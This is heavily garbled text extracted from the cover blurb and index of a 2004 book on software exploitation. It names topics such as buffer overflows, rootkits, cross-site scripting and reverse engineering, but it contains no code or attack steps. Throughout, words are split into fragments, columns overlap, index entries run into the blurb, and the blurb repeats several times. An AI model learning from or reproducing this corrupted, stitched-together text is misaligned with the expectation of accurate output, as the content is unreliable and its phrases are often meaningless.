How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are vs. b lack list s 2nd fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Whit e sp ace in equiv alen t requ est s What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Whit ehat Secu rit y Arsenal ( Rubin ) Whit t ak er , Jam es

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Winam p p rogram t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Windows operat ing sy st em s at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . disabling system f ile prot ect ion for heap h eader s in book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he This m ust - h ave kern el pat chin in 2nd 3rdt 4t h 5t h 6tin h 7t 8t h 9t h 10ting h 11tbook h 12t s, h you w ill learn abou t scr ipt k id die tgr eat m en f ound mhany hack key loggers in 2nd lin es of code in

Why pum sof ps t winar e message

ex ploit w ill con t inue t o be a ser ious p r oblem

wcsncat fu nct ion in 2nd

When net w or k( WEP) securencry it y pt mion ech anisms Wired equ ivalent privacy algorit hm

do n ot w or k

Wireless sy st em s

ack fut uAt re tof 2ndpat t er ns hiding at t acker ident it y in 2nd Worm s

Rev er se engineer in g

oper at ion of 2nd

Classic at t acks ag ainst serv er soft w ar e

ser vice out ages f rom writ e_eeprom f unct ion

Sur pr ising at t acks ag ainst clien t soft war e

Writ eProcessMem ory f un ction Writ ingTech niqu es

f or cr aft ing m aliciou s inpu t

en abling, EEPROM for hardware 2nddet 3rdails 4t h of 5t h b6tuf h fer 7t h 8t The t mem echnory ical ovh er f low s kern el root kits mast Root er boot k it record s memo ry in reverse engineering 2nd

Ex to p lo i t in g mem S o ftory w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak physical softtowpriv ar e. ileged resources Writ ing Secu re Code (Ho ward an d LeBlan c) 2nd 3rd WSARecv fun ct ion backtr acing to in par tit ion an alysis in rev erse eng in eer in g WSASend fu nct ion Wscript . net work , at ta cks on WScript .Shell, at t acks on

wsprin tf fun ct ion



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X ] [ Z ] x com m and 2nd X Wind ows, back doors on x 86 debugg ers 2nd 3rd x 86 f eat u re set XML m ark up la ngua ge XOR prot ect ion Table of Content s • XSS (cro ss-sit e script • I ndexin g) inoit HTTP eaders Expl ing hSoftw a re How to Br e ak Code in HTTP q uery st rin gs 2nd By Gr eg Hoglund , Gar y McGr aw in Javascript a lert dialog at t acks in ref lection again st t ru st ed sit es lish Wesley inPub sim pleer:scrAddison ip t inj ection 2nd Dat e: tFebruary 17,mes 200 4 inPub u ser-con rolled f ilena x t er ms with I SBN: serv 0-er 20soft 1- 786 ware 95 -8 Xt lib, b uff er ov erf Pages: 51low 2 in

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Zone t ra nsf er s ZwCreat ePr ocess f un ct io n ZwCreat eSect ion fu nct ion 2nd ZwOpen File f un ct ion 2nd 3rd



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.